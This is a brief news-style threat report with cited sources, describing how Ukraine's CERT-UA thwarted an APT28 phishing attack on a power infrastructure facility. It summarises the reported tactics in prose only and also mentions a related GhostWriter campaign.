Ukraine’s Computer Emergency Response Team (CERT-UA) successfully defended a critical power infrastructure facility from a cyber attack [4]. The attack was attributed to the Russian threat actor APT28 [2] [3] [4] [5], also known as BlueDelta [2] [3] [4], Fancy Bear [1] [2] [3] [4], Forest Blizzard [2] [3] [4], or FROZENLAKE [2] [3] [4]. This incident is part of ongoing phishing attacks against Ukraine [4].
Description
The attack began with a phishing email containing a malicious ZIP archive [2] [3] [4], which activated the infection chain when downloaded. APT28 utilized various tactics, including the creation of decoy web pages [2], the execution of BAT and VBS files [2], and the exfiltration of information [2] [3]. They also used the TOR hidden service to route malicious traffic [2]. To maintain persistence [3], they employed a legitimate service called webhook.site for remote command execution using cURL [3]. However, the attack was ultimately unsuccessful due to restricted access to certain resources [2] [3] [4], including Mocky and the Windows Script Host [2] [4]. It is worth noting that APT28 has previously been associated with the use of Mocky APIs [2] [3]. CERT-UA has detected APT28 attempted attacks on Ukrainian organizations in the past. The attack seems to be more focused on enabling future operations rather than causing direct disruption [1]. Another cyberattack [4], attributed to GhostWriter [2] [3] [4] [5], exploited a zero-day flaw in WinRAR to deploy PicassoLoader and Cobalt Strike [4]. Some of the phishing attacks against Ukraine utilize the malware obfuscation engine ScruptCrypt [4].
Conclusion
The successful defense of the critical power infrastructure facility highlights the importance of robust cybersecurity measures. The restricted access to certain resources played a crucial role in thwarting the attack. However, the ongoing phishing attacks and the use of advanced tactics by threat actors like APT28 and GhostWriter underscore the need for continuous vigilance and proactive mitigation strategies. Future operations by these threat actors could pose significant risks, necessitating enhanced security measures and increased awareness within Ukrainian organizations.
References
[1] https://www.infosecurity-magazine.com/news/russia-apt28-attack-ukraine-power/
[2] https://www.redpacketsecurity.com/ukraine-s-cert-thwarts-apt-s-cyberattack-on-critical-energy-infrastructure/
[3] https://thehackernews.com/2023/09/ukraines-cert-thwarts-apt28s.html
[4] https://vulnera.com/newswire/ukraines-cert-foils-apt28-cyberattack-aimed-at-energy-infrastructure/
[5] https://cyber.vumetric.com/security-news/2023/09/06/ukraine-s-cert-thwarts-apt28-s-cyberattack-on-critical-energy-infrastructure/
